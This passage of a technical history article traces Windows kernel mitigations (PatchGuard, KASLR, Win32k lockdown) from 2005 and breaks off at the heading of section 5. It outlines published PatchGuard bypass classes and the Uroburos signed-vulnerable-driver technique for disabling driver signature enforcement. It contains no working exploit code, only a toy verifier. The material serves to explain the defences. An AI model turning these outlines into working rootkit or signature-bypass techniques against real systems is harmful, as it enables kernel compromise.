&lt;p&gt;That sentence will read like editorial provocation until you see the architecture. Uroburos did not bypass PatchGuard. It side-stepped it. The rootkit shipped a signed-but-vulnerable copy of Oracle&apos;s &lt;code&gt;VBoxDrv.sys&lt;/code&gt;, used the vulnerability to flip the &lt;code&gt;g_CiEnabled&lt;/code&gt; flag that gates Driver Signature Enforcement, loaded its own unsigned kernel driver, and then operated alongside PatchGuard for three years (2011 -- 2014) without ever modifying anything PatchGuard checked [@gdata-uroburos-blog] [@stmxcsr-turla]. The Stage 2 evolution survey calls this the canonical refutation of the most common reader misconception about PatchGuard: not &quot;PatchGuard was broken&quot; but &quot;PatchGuard&apos;s protected-structure list is, by construction, narrower than the kernel-modification surface.&quot;&lt;/p&gt;

A defense that shares its CPU privilege level with the attacker can in principle always be subverted by an attacker at that privilege level, because every code path and data structure the defense relies on is, by construction, mutable by the attacker. The paradox is not a formal impossibility theorem in the cryptographic sense, but it is the de facto design constraint Microsoft has acknowledged in writing through its Security Servicing Criteria [@ms-servicing-criteria].

A Microsoft kernel feature that periodically verifies a fixed list of kernel structures -- the SSDT, IDT, GDT, syscall MSRs, the in-memory `nt` and `hal` images, and select processor control registers -- and bug-checks the system with stop code `CRITICAL_STRUCTURE_CORRUPTION` (0x109) on mismatch. Introduced April 25, 2005 in Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition; never shipped on x86 [@ms-advisory-932596] [@ms-driver-x64-restrictions]. PatchGuard is an *engineering deterrent*, not a security boundary.
&lt;p&gt;This article covers four mitigations across twenty-one years -- April 25, 2005, when PatchGuard shipped with Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition [@ms-advisory-932596], through June 2026, when kCET and the VTL1-anchored stack are the front line. The four mitigations are PatchGuard (KPP), KASLR (and its 2018 successor KVA Shadow), KDP (Kernel Data Protection), and the two-stage Win32k Lockdown that began in 2012 with &lt;code&gt;DisallowWin32kSystemCalls&lt;/code&gt; and resolved in 2017 with &lt;code&gt;Win32kSystemCallFilter&lt;/code&gt; [@ms-syscall-disable-policy] [@ms-syscall-filter-policy]. They do not look like they belong together until you notice the direction. Each generation moves the defense one step further away from where the attacker lives: from in-kernel obfuscation, to address-space tricks, to hypervisor-anchored isolation (VTL1), to attack-surface deletion.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every meaningful Windows kernel mitigation since 2017 has moved the &lt;em&gt;enforcement&lt;/em&gt; to a privilege level the kernel-mode attacker cannot reach -- hypervisor (VTL1), CPU silicon (KTRR on Apple, kCET shadow stack hardware on Intel / AMD), or out of the syscall surface entirely. The reason is the same-privilege paradox: a defense that lives where the attacker lives cannot, in principle, succeed.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Four misconceptions are worth retiring before we start. &lt;strong&gt;First&lt;/strong&gt;, &quot;PatchGuard is the load-bearing kernel-rootkit defense&quot;; in fact, Microsoft says it is not a security boundary at all, and Uroburos operated alongside it for three years. &lt;strong&gt;Second&lt;/strong&gt;, &quot;PatchGuard is x64-only&quot;; the documentation is x64-centric, but in 2026 PatchGuard also runs on 64-bit ARM Windows -- the one architectural truth in the framing is that PatchGuard never shipped on 32-bit Windows. &lt;strong&gt;Third&lt;/strong&gt;, &quot;KASLR is dead because entropy is the variable that matters&quot;; the Hund-Willems-Holz 2013 result and Gruss et al. 2017 generalization showed that &lt;em&gt;randomness&lt;/em&gt; was never the load-bearing defense -- structural unreachability is [@doi-hund-2013] [@gruss-kaiser-pdf]. &lt;strong&gt;Fourth&lt;/strong&gt;, &quot;Win32k Lockdown killed half the LPE class&quot;; the lockdown removes roughly the historically-vulnerable syscall surface &lt;em&gt;from sandboxed renderers specifically&lt;/em&gt;, not from the operating system in general [@pz-breaking-chain].&lt;/p&gt;
&lt;p&gt;To see why Microsoft has spent twenty-one years on a problem that, by their own admission, has no in-kernel answer, we have to go back to April 25, 2005 -- and to the architectural break that made the new contract politically possible.&lt;/p&gt;
&lt;h2&gt;2. Why Microsoft built PatchGuard at all (1998 -- 2005)&lt;/h2&gt;
&lt;p&gt;Before April 2005, the Windows kernel was a public hooking surface &lt;em&gt;by design&lt;/em&gt;. McAfee, Symantec, F-Secure, and Trend Micro patched the System Service Descriptor Table (SSDT), hooked the Interrupt Descriptor Table (IDT), and inline-patched &lt;code&gt;nt!Nt*&lt;/code&gt; system-service routines as legitimate engineering practice. The same primitives, applied with malicious intent, became the rootkit canon of the late 1990s and early 2000s: NTRootkit, FU, Hacker Defender. From the operating system&apos;s point of view, the defender and the attacker were architecturally indistinguishable.&lt;/p&gt;

A kernel data structure on Windows containing function pointers to every system service routine (the `Nt*` functions that implement system calls). On 32-bit Windows, anti-virus vendors routinely patched the SSDT to intercept system calls before the kernel processed them. On x64, modifying the SSDT is prohibited and PatchGuard treats it as a `CRITICAL_STRUCTURE_CORRUPTION` event [@ms-driver-x64-restrictions].
&lt;p&gt;The symmetry was awkward enough in normal operation. It became politically untenable in October 2005, when Mark Russinovich discovered that Sony BMG&apos;s XCP DRM software, shipped on tens of millions of audio CDs, installed an actual cloaking rootkit on consumer Windows machines.Russinovich&apos;s October 31, 2005 Sysinternals post &quot;Sony, Rootkits and Digital Rights Management Gone Too Far&quot; turned a niche kernel-internals topic into national news within a week. The lawsuit settlements and CD recall that followed established, in pop-culture terms, the symmetry between &quot;legitimate kernel hooking&quot; and &quot;malware kernel hooking&quot; that the security industry had been arguing about for years. The XCP code was structurally identical to malware -- it hid files whose names began with &lt;code&gt;$sys$&lt;/code&gt;, modified system calls, and resisted removal -- and it shipped under a Sony certificate.&lt;/p&gt;
&lt;p&gt;What Microsoft needed was an architectural break large enough that they could rewrite the kernel contract without having to honor the old one. They got it from AMD. The x64 architecture, productised as AMD64 and adopted by Intel as EM64T, was Microsoft&apos;s once-in-a-decade chance to publish a new contract incompatible with the old. Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition shipped on April 25, 2005 [@ms-advisory-932596]. The new kernel-mode contract had two enforcement layers. &lt;strong&gt;PatchGuard&lt;/strong&gt; was the engineering enforcement -- the code that periodically inspected the kernel&apos;s most sensitive structures and bug-checked the system on mismatch. &lt;strong&gt;Kernel-Mode Code Signing (KMCS)&lt;/strong&gt; was the policy enforcement -- the rule that production x64 kernels would load only Authenticode-signed drivers.&lt;/p&gt;

The policy on 64-bit Windows that the kernel will load only Authenticode-signed kernel drivers in production (test-signing modes exist for development). KMCS shipped with the same April 2005 release as PatchGuard and is its policy counterpart -- KMCS controls what code enters the kernel; PatchGuard checks the kernel structures the loaded code is expected to leave alone [@ms-driver-x64-restrictions].
&lt;p&gt;The combination did exactly what the AV industry feared. Their entire detection methodology was, by the new contract, illegal on x64. McAfee bought a full-page ad in the &lt;em&gt;Financial Times&lt;/em&gt; in October 2006 to call Microsoft&apos;s behaviour anti-competitive. Symantec joined the EC complaint. The verbatim industry framing was delivered by Vincent Weafer, then Symantec&apos;s senior director of security response, in a &lt;em&gt;CRN&lt;/em&gt; report: &lt;em&gt;&quot;Either everybody has access to the kernel or nobody has access to the kernel -- and we believe in the latter&quot;&lt;/em&gt; [@crn-mcafee-symantec]. Microsoft declined to publish a signed bypass API. By the time the dust settled, the AV-vendor hooking pattern on Windows had been industrially ended.&lt;/p&gt;

Either everybody has access to the kernel or nobody has access to the kernel -- and we believe in the latter. -- Vincent Weafer, Symantec, quoted in CRN, September 25, 2006 [@crn-mcafee-symantec].

McAfee and Symantec argued that Vista x64 plus PatchGuard locked third-party security vendors out of the kernel while Microsoft&apos;s own Windows Defender remained free to ship integrations Microsoft had not exposed to anyone else. The EC investigation eventually closed without forcing Microsoft to expose a signed bypass API. The 2024 CrowdStrike Falcon outage -- where a single bad signature update propagated through a kernel driver and bricked an estimated 8.5 million Windows machines worldwide -- is now widely read, retroactively, as vindication of Microsoft&apos;s 2006 position. The argument that &quot;everybody or nobody&quot; has kernel access turned out to have a third answer: &quot;as few people as possible, with as small a kernel footprint as possible, mediated by user-mode brokers.&quot; That is the design move the rest of this article is about.
&lt;p&gt;The historical record has one quirk worth flagging. No primary 2005 PatchGuard launch document is preserved in Microsoft&apos;s current documentation surface; the earliest official primary is Microsoft Security Advisory 932596 from August 2007, which describes Kernel Patch Protection as protecting &quot;code and critical structures in the Windows kernel from modification by unknown code or data&quot; and announces an upcoming PatchGuard update [@ms-advisory-932596]. The technical detail of what PatchGuard checked was reverse-engineered by the offensive security community before Microsoft documented it.&lt;/p&gt;

gantt
    title Windows kernel self-defense, 2005-2026
    dateFormat YYYY-MM
    section Same-privilege (CPL=0)
    PatchGuard v1            :2005-04, 2008-02
    PatchGuard v2-v3         :2006-11, 2010-10
    PatchGuard v7-v8         :2012-08, 2026-06
    KASLR (8-bit entropy)    :2007-01, 2018-01
    section CPU mediated
    KVA Shadow               :2018-01, 2026-06
    kCET / shadow stack      :2022-09, 2026-06
    section VTL1 anchored
    HVCI                     :2015-07, 2026-06
    kCFG with VBS bitmap     :2017-04, 2026-06
    KDP static plus dynamic  :2020-05, 2026-06
    section Surface deletion
    DisallowWin32kSystemCalls:2012-08, 2017-10
    Win32kSystemCallFilter   :2017-10, 2026-06
&lt;p&gt;So the contract was published, the kernel was no longer a public hooking surface, and Microsoft shipped a feature called PatchGuard that ran inside the kernel and checked the kernel&apos;s most sensitive structures. The question Skywing and skape would publish nine months later was the question everybody in offensive security had been waiting for: &lt;em&gt;how do you defend a kernel from inside the kernel?&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;3. PatchGuard v1 and v2: obfuscation as defense (2005 -- 2008)&lt;/h2&gt;
&lt;p&gt;PatchGuard v1 was an engineering answer to a political problem. It worked exactly the way a defense works if you do not state out loud that the attacker is in the same address space: a periodic timer fired, a checksum was recomputed, a mismatch caused the machine to bug-check with stop code &lt;code&gt;CRITICAL_STRUCTURE_CORRUPTION&lt;/code&gt; (0x109), and the assumption was that the cost of figuring out which timer, which checksum, and which DPC handler was high enough to deter casual rootkit authors. And for nine months, that was the story.&lt;/p&gt;

The Windows bug-check stop code raised by PatchGuard when one of its periodic integrity checks detects an unexpected modification to a protected kernel structure. The bug-check call goes through `KeBugCheckEx`, which on later PatchGuard generations is itself a protected structure -- swallowing the bug-check from a hooked `KeBugCheckEx` was one of the four bypass classes Skywing and skape catalogued in 2005 [@uninformed-v3-archive].
&lt;p&gt;What does PatchGuard actually check? The protected-structure list has grown across generations, but the core, as Microsoft documents it for driver authors, has been remarkably stable [@ms-driver-x64-restrictions]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The SSDT and &lt;code&gt;KeServiceDescriptorTable[Shadow]&lt;/code&gt; (the function-pointer tables that dispatch system calls)&lt;/li&gt;
&lt;li&gt;The Interrupt Descriptor Table (IDT), read from the CPU via &lt;code&gt;IDTR&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The Global Descriptor Table (GDT), read from the CPU via &lt;code&gt;GDTR&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The syscall-related model-specific registers: &lt;code&gt;IA32_LSTAR&lt;/code&gt;, &lt;code&gt;IA32_STAR&lt;/code&gt;, &lt;code&gt;IA32_CSTAR&lt;/code&gt;, and the &lt;code&gt;IA32_SYSENTER_*&lt;/code&gt; family&lt;/li&gt;
&lt;li&gt;The in-memory &lt;code&gt;nt&lt;/code&gt; and &lt;code&gt;hal&lt;/code&gt; kernel images (so you cannot inline-patch &lt;code&gt;nt!NtCreateFile&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;KdpStub&lt;/code&gt;, &lt;code&gt;KeBugCheckCallbackHead&lt;/code&gt;, and other kernel call-back tables&lt;/li&gt;
&lt;li&gt;Select processor control registers and debug registers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Mechanism: a context block built by &lt;code&gt;nt!KiInitializePatchGuard&lt;/code&gt; at boot, scattered across allocations, XOR-encrypted; a DPC-driven verifier routine that fires at randomized intervals; a per-fire recomputation of expected checksums; a &lt;code&gt;KeBugCheckEx(0x109, ...)&lt;/code&gt; call on any mismatch. The load-bearing property of the design -- the one that drives the rest of the story -- is that &lt;em&gt;the defense lives at CPL=0, alongside the attacker&lt;/em&gt;. The verifier, the keys, the schedule, the bug-check routine itself: all of it lives in the same address space as the rootkit it is meant to detect.&lt;/p&gt;

flowchart TD
    A[Timer fires at random interval] --&amp;gt; B[DPC routine dispatched]
    B --&amp;gt; C[Decrypt scattered context fragment]
    C --&amp;gt; D[Hash protected structures]
    D --&amp;gt; E{Hash matches expected}
    E -- yes --&amp;gt; F[Reschedule next check]
    E -- no --&amp;gt; G[Call KeBugCheckEx 0x109]
    G --&amp;gt; H[System bug-check CRITICAL_STRUCTURE_CORRUPTION]
    F --&amp;gt; A
&lt;p&gt;In December 2005, eight months after PatchGuard shipped, Skywing and skape published &quot;Bypassing PatchGuard on Windows x64&quot; in &lt;em&gt;Uninformed&lt;/em&gt; Volume 3 [@uninformed-v3-archive]. The paper enumerated four architectural bypass classes that would, with minor variations, survive every PatchGuard generation Microsoft has shipped since:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Patch the verifier timer.&lt;/strong&gt; If you control the DPC queue, you can prevent the check from ever firing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hook the verification callback.&lt;/strong&gt; Replace the function pointer the DPC routine is dispatched through.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Replace the DPC routine.&lt;/strong&gt; Rewrite the bytes of &lt;code&gt;nt!KiPatchGuardCheckRoutine&lt;/code&gt; itself, before it executes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Swallow the bug-check.&lt;/strong&gt; Hook &lt;code&gt;KeBugCheckEx&lt;/code&gt; so that the eventual mismatch call returns to the attacker&apos;s handler instead of crashing the system.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The &lt;code&gt;KiInitializePatchGuard&lt;/code&gt; initialization routine itself uses the &quot;scattered initialization&quot; tradition Microsoft inherited from Windows 2000 -- the context block is not allocated as a single contiguous structure but assembled from fragments at randomized offsets, each XOR-keyed against a derived value the verifier alone reconstructs at check time. The fragments are referenced through call-graph paths designed to be inaccessible to a static reader. This is exactly the &lt;em&gt;engineering cost&lt;/em&gt; layer that Skywing&apos;s 2005 paper would later identify as raising the cost of bypass without affecting any structural bypass class.&lt;/p&gt;
&lt;p&gt;The thesis the &lt;em&gt;Uninformed&lt;/em&gt; paper stated in its abstract was the framing Microsoft would not formally adopt in writing for another twelve years: &lt;em&gt;any&lt;/em&gt; defense at the same privilege as the attacker can be subverted in principle, because the attacker can do anything the defense can do -- including reading the obfuscation key and rewriting the check. The argument is structural, not empirical. Skywing&apos;s contribution was not &quot;we broke PatchGuard&quot;; it was &quot;PatchGuard&apos;s class of defense has a fixed structural ceiling, and the ceiling is below &apos;security boundary.&apos;&quot;&lt;/p&gt;

The biographical pattern that ran through this story is unusual and worth naming explicitly. Skape (Matt Miller) later joined Microsoft and became the lead on multiple mitigation features. Skywing (Ken Johnson) later wrote the bylined MSRC blog post that introduced KVA Shadow in 2018 [@ms-kva-shadow-blog]. Andrea Allievi, who reverse-engineered PatchGuard 8.1 at NoSuchCon 2014 [@allievi-nsc2014], later co-authored *Windows Internals 7e Part 2* and the 2020 KDP launch blog [@ms-kdp-blog]. The pattern is not random: the offensive-research community that proved the same-privilege paradox was the same community Microsoft eventually hired to design the cross-privilege answer.
&lt;p&gt;Microsoft did exactly what you would expect a serious engineering organisation to do when an obfuscation layer is partially peeled back: they added another. PatchGuard v2 shipped in 2006 servicing updates and was inherited by Vista x64 in November 2006. It introduced an XOR-encrypted-and-scattered context, decoy DPC routines, a generalised anti-hook framework that flagged modifications to additional kernel function tables, and randomized timer phase. In January 2007 Skywing published &quot;Subverting PatchGuard Version 2&quot; in &lt;em&gt;Uninformed&lt;/em&gt; Volume 6, walking through the v2 hardening in detail and demonstrating that the same four bypass classes survived [@uninformed-v6-archive]. The engineering cost was raised; the structural ceiling was not.&lt;/p&gt;
&lt;p&gt;It is worth seeing the integrity check as a teaching primitive. The real implementation is hardened with anti-disassembly and anti-debugging tricks that we will not reproduce; the underlying &lt;em&gt;control loop&lt;/em&gt; is plain.&lt;/p&gt;
&lt;p&gt;{`
// Conceptual demonstration only -- the real PatchGuard is far more obfuscated
const protectedStructures = {
  SSDT: &apos;eb2f4c1abe007f29d6c910a9c66e0b21&apos;,
  IDT:  &apos;7c4b48a39b22d5f0a1e4ecb0d80b1c2a&apos;,
  GDT:  &apos;0d1f3a72b9aa6d8a14e88f9d22cc66ab&apos;,
  KeBugCheckEx: &apos;6677aabbccdd0011223344556677ff88&apos;,
};
const expected = {...protectedStructures};&lt;/p&gt;
&lt;p&gt;function hashStructure(name) {
  // In real KPP this is a derived hash over current memory contents
  return protectedStructures[name];
}&lt;/p&gt;
&lt;p&gt;function patchguardCheck() {
  for (const name of Object.keys(expected)) {
    if (hashStructure(name) !== expected[name]) {
      // KeBugCheckEx(CRITICAL_STRUCTURE_CORRUPTION, ...)
      console.log(&apos;BUGCHECK 0x109 on&apos;, name);
      return;
    }
  }
  console.log(&apos;All structures intact -- reschedule&apos;);
}&lt;/p&gt;
&lt;p&gt;// Simulate one tick of the verifier
patchguardCheck();&lt;/p&gt;
&lt;p&gt;// Simulate an attacker modifying SSDT
protectedStructures.SSDT = &apos;ffffffffffffffffffffffffffffffff&apos;;
patchguardCheck();
`}&lt;/p&gt;
&lt;p&gt;The toy is honest about the shape: a verifier walks a fixed list, computes a hash, compares against a stored expected value, calls a bug-check on mismatch. Everything Skywing&apos;s bypass classes targeted -- the verifier&apos;s schedule, the verifier&apos;s code, the expected-hash store, the bug-check primitive -- is sitting in the address space the attacker also writes.&lt;/p&gt;
&lt;p&gt;By January 2007, the pattern was set. Microsoft adds an obfuscation layer; Skywing peels it back; Microsoft adds another. Both sides were right. Microsoft was right that the engineering cost mattered: the AV-vendor hooking pattern was being industrially ended, signed third-party kernel drivers were a much narrower entry point than the old free-for-all, and casual rootkit authors were locked out of the bypass class. Skywing was right that engineering cost is not a security boundary. The next decade would prove both.&lt;/p&gt;
&lt;h2&gt;4. The evolution, generation by generation (2008 -- 2016)&lt;/h2&gt;
&lt;p&gt;Twelve years of cat-and-mouse ran on two parallel tracks. PatchGuard added DPC-based checks in v3 (Vista SP1 / Server 2008, February 2008) [@uninformed-v8-archive], HAL function-table verification and stack-context randomisation in Windows 7 -- 8 (2009 -- 2012), and a context-block ring in Windows 8.1 (2013) -- which Andrea Allievi reverse-engineered at NoSuchCon 2014, again finding four independent bypass paths [@allievi-nsc2014]. Meanwhile, two quieter developments laid the groundwork for what was coming: KASLR shipped on Vista x64 in 2007 [@russinovich-vista-part3], and Jurczyk and Coldwind&apos;s Bochspwn project in 2013 falsified the industry&apos;s assumption that win32k LPE bugs were a tail of accidents [@j00ru-bochspwn-blog].&lt;/p&gt;
&lt;h3&gt;The PatchGuard generation ladder&lt;/h3&gt;
&lt;p&gt;Each generation tightened the engineering cost without changing the structural ceiling. The table below summarises the evolution; the right-most column lists the canonical reverse-engineering primary, which in every generation came from outside Microsoft.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Year, OS first shipped&lt;/th&gt;
&lt;th&gt;Key delta&lt;/th&gt;
&lt;th&gt;Canonical reverse-engineering primary&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;v1&lt;/td&gt;
&lt;td&gt;April 2005, XP x64 / Server 2003 SP1 x64&lt;/td&gt;
&lt;td&gt;Baseline -- single context block, fixed protected-structure list, single DPC&lt;/td&gt;
&lt;td&gt;Skywing &amp;amp; skape, &lt;em&gt;Uninformed&lt;/em&gt; v3, Dec 2005 [@uninformed-v3-archive]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v2&lt;/td&gt;
&lt;td&gt;2006 servicing, inherited by Vista x64 Nov 2006&lt;/td&gt;
&lt;td&gt;XOR-encrypted scattered context, decoy DPCs, anti-hook framework&lt;/td&gt;
&lt;td&gt;Skywing, &lt;em&gt;Uninformed&lt;/em&gt; v6, Jan 2007 [@uninformed-v6-archive]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v3&lt;/td&gt;
&lt;td&gt;Vista SP1 / Server 2008, Feb 2008&lt;/td&gt;
&lt;td&gt;Multiple concurrent contexts, randomised timer phase, &lt;code&gt;KeBugCheckEx&lt;/code&gt; self-protection&lt;/td&gt;
&lt;td&gt;Skywing, &lt;em&gt;Uninformed&lt;/em&gt; v8, Sep 2007 [@uninformed-v8-archive]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v7 (Windows 7)&lt;/td&gt;
&lt;td&gt;2009 -- 2010&lt;/td&gt;
&lt;td&gt;HAL function-table verification, stack-context randomisation&lt;/td&gt;
&lt;td&gt;Community RE; no single canonical paper&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v8 (Windows 8)&lt;/td&gt;
&lt;td&gt;2012&lt;/td&gt;
&lt;td&gt;&lt;code&gt;KeServiceDescriptorTableShadow&lt;/code&gt; added (now covers win32k syscall table), expanded MSR list&lt;/td&gt;
&lt;td&gt;Community RE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;v8.1&lt;/td&gt;
&lt;td&gt;2013 (Windows 8.1)&lt;/td&gt;
&lt;td&gt;Single context block replaced by &lt;strong&gt;context-block ring&lt;/strong&gt;; atomic patching of every block required; 247 protected structures (vs ~26 on Vista x64)&lt;/td&gt;
&lt;td&gt;Andrea Allievi, NoSuchCon 2014 [@allievi-nsc2014]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Allievi&apos;s 2014 talk is the clearest single picture of what hardening looked like by the Windows 8.1 era. The single context block had become a singly-linked list (SLIST) of context blocks. The cryptographic self-integrity check now ran across the SLIST. The protected-structure set had grown from roughly twenty-six on Vista x64 to &lt;strong&gt;two hundred and forty-seven&lt;/strong&gt; by Windows 8.1, including &lt;code&gt;HalPrivateDispatchTable&lt;/code&gt; and &lt;code&gt;HalpInterruptController&lt;/code&gt; [@allievi-nsc2014]. And the four 2006 bypass classes still worked. The engineering cost of bypassing PatchGuard had risen by an order of magnitude; the architectural class of bypass had not changed.&lt;/p&gt;
&lt;h3&gt;KASLR on Vista, February -- April 2007&lt;/h3&gt;
&lt;p&gt;In parallel with the PatchGuard generation ladder, Microsoft shipped a different style of defense on the same kernel. Mark Russinovich&apos;s three-part &lt;em&gt;Inside the Windows Vista Kernel&lt;/em&gt; series in TechNet Magazine documented the new mitigation in April 2007 [@russinovich-vista-part3]: the kernel image base, instead of being constant, was selected at boot from a small space of possible offsets.&lt;/p&gt;

Randomising the kernel image base across boots, so that an attacker with a stale or guessed kernel address cannot use it as an absolute reference. On Vista x64 the implementation had roughly eight bits of entropy (256 possible kernel base addresses), selected at boot time by `winload.exe` [@russinovich-vista-part3]. The mitigation is *probabilistic* by construction: it raises the cost of an unprivileged information-leak, but cannot survive a deterministic side-channel attacker.
&lt;p&gt;The Vista bootloader, &lt;code&gt;winload.exe&lt;/code&gt;, was the component that picked the kernel image base at boot. The choice of selecting the offset early -- before the kernel proper executes -- was deliberate; KASLR after the kernel is mapped is harder to do because every kernel pointer recorded so far becomes invalid. The Vista bootloader was also the component PatchGuard&apos;s protected list depended on: an attacker with bootloader code execution simply chose their own offset.&lt;/p&gt;
&lt;p&gt;The probabilistic framing held until 2013. Hund, Willems, and Holz published &quot;Practical Timing Side Channel Attacks Against Kernel Space ASLR&quot; at IEEE S&amp;amp;P 2013 [@doi-hund-2013]. Their technique exploited the shared TLB and cache state between user mode and kernel mode on every x86 / x64 CPU then shipping: an unprivileged user-mode timer could measure differential cache behaviour when accessing addresses near where the kernel mapped its image, and recover the kernel base in seconds. Eight bits of entropy collapse fast under a side-channel that gives you one bit per probe. Gruss et al. generalised the argument in 2017 with a paper whose title was the thesis: &lt;em&gt;&quot;KASLR is Dead: Long Live KASLR&quot;&lt;/em&gt; [@gruss-kaiser-pdf]. The structural answer would have to be something other than entropy.&lt;/p&gt;
&lt;h3&gt;The 2012 Windows 8 attempt at attack-surface deletion&lt;/h3&gt;
&lt;p&gt;While KASLR&apos;s structural limits were being demonstrated in academia, Microsoft shipped a different style of mitigation in Windows 8: &lt;code&gt;DisallowWin32kSystemCalls&lt;/code&gt;, a process-level option enabling the kernel to refuse &lt;em&gt;every&lt;/em&gt; win32k system call from a process that opted in [@ms-syscall-disable-policy]. The semantics are all-or-nothing: a process either can call into &lt;code&gt;win32k.sys&lt;/code&gt; or it cannot. Useful for non-UI broker processes (where the answer is &quot;never&quot;). Structurally inadequate for browser renderers, which need to draw windows, render fonts, and dispatch input through a constrained-but-non-empty subset of the win32k surface. The mitigation languished for five years, waiting for the per-syscall version that arrived in 2017.&lt;/p&gt;
&lt;h3&gt;The Bochspwn empirical surprise&lt;/h3&gt;
&lt;p&gt;In 2013, Mateusz Jurczyk and Gynvael Coldwind presented Bochspwn at SyScan and at Black Hat USA [@j00ru-bochspwn-blog] [@j00ru-bhusa-pdf]. The methodology was a Bochs x86 emulator instrumented to trace every memory access made by the kernel during syscall handling. The instrumentation found classes of bugs -- specifically &lt;em&gt;double-fetch&lt;/em&gt; bugs, where the kernel reads the same user-controlled memory twice without re-validating between reads -- by tagging each user-pointer dereference and looking for repeats.&lt;/p&gt;

A double-fetch happens when kernel code reads a value from user-mode memory, validates it, and later reads the *same* address again expecting the value to be unchanged. A racing user-mode thread can flip the value between the two reads, defeating the validation. Detecting double-fetches statically is hard; detecting them by static analysis on a closed-source kernel is harder still. Bochspwn solved the detection problem at the emulator level: instrument the entire kernel under Bochs, log every memory read of every page table mapped writable from user mode, and post-process the trace for &quot;same address, same kernel function, two reads, no intervening synchronisation.&quot; The result: dozens of exploitable kernel race conditions across multiple Windows versions, the *majority* in `win32k.sys` [@j00ru-bochspwn-blog]. The win32k bug class was systemic, not accidental.
&lt;p&gt;Jurczyk&apos;s empirical finding mattered because it pre-dated the design of the eventual lockdown by four years. The community knew, by mid-2013, that &lt;em&gt;win32k.sys was a bug class, not a bug tail&lt;/em&gt;. Microsoft&apos;s eventual answer -- per-process filtering of the win32k syscall surface -- had a clean empirical motivation by the time it shipped.&lt;/p&gt;
&lt;p&gt;The pre-Bochspwn high-profile example was already in the literature: Bruce Dang and Peter Ferrie&apos;s December 2010 talk at the 27th Chaos Communication Congress (&quot;Adventures in Analyzing Stuxnet&quot;) had named CVE-2010-2743, a &lt;code&gt;win32k.sys&lt;/code&gt; &lt;code&gt;NtUserLoadKeyboardLayoutEx&lt;/code&gt; LPE that Stuxnet used to escalate from user to kernel on Windows XP [@nvd-cve-2010-2743]. Stuxnet placed one of the most consequential kernel-level malware operations on record on top of a single win32k vulnerability. Bochspwn explained why: the surface was structurally vulnerable, not accidentally so.&lt;/p&gt;
&lt;h3&gt;The intellectual surprise of this act -- Uroburos coexisted with PatchGuard&lt;/h3&gt;
&lt;p&gt;The cleanest demonstration that the same-privilege paradox is empirical, not theoretical, came in February 2014. G Data SecurityLabs published its analysis of Uroburos, a Russian-attributed espionage rootkit that had been operating in production for an estimated three years [@gdata-uroburos-blog]. Uroburos did not bypass PatchGuard. It loaded a copy of Oracle&apos;s &lt;code&gt;VBoxDrv.sys&lt;/code&gt; (a signed third-party driver shipped as part of VirtualBox), used a privilege-escalation vulnerability in that driver to flip the &lt;code&gt;g_CiEnabled&lt;/code&gt; flag (the gate for Driver Signature Enforcement), loaded its own unsigned rootkit driver, and then operated for three years in production &lt;em&gt;without ever modifying anything PatchGuard checked&lt;/em&gt; [@stmxcsr-turla].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The most-repeated misreading of PatchGuard&apos;s track record is &quot;Uroburos was a PatchGuard bypass.&quot; It was not. Uroburos was a Driver Signature Enforcement (DSE) bypass that operated &lt;em&gt;alongside&lt;/em&gt; PatchGuard for three years (2011 -- 2014) without modifying any PatchGuard-protected structure [@gdata-uroburos-blog] [@stmxcsr-turla]. The lesson is structural: PatchGuard&apos;s protected-structure list is, by construction, narrower than the kernel-modification surface, and a disciplined attacker simply stays outside the list. The corollary -- that no in-kernel integrity monitor can be wider than its protected-structure list, and any list narrower than &quot;all kernel memory&quot; leaves gaps -- is the empirical anchor for the same-privilege paradox.&lt;/p&gt;
&lt;/blockquote&gt;

The policy on 64-bit Windows that the kernel will load only Authenticode-signed drivers in production. DSE is gated by an in-memory flag (`nt!g_CiEnabled` historically, `nt!g_CiOptions` on later builds). An attacker with arbitrary kernel write can flip the flag and load unsigned drivers -- which is precisely how the BYOVD attack pattern works [@gdata-uroburos-blog] [@hfiref0x-upgdsed].
&lt;p&gt;Three insights converged from this act. From the side-channel KASLR literature: some defenses cannot succeed at CPL=0 because the &lt;em&gt;attack&lt;/em&gt; is below the operating system. From Allievi 2014 and Uroburos 2011 -- 2014: same-privilege obfuscation is permanently bounded by engineering cost, no matter how much engineering cost you pay. From Bochspwn: win32k is not a bug tail but a bug class -- the only structural answer is to delete the surface rather than defend it. The 2017 calendar year was about to land all three answers at once.&lt;/p&gt;
&lt;h2&gt;5. 2017&apos;s triple inflection&lt;/h2&gt;
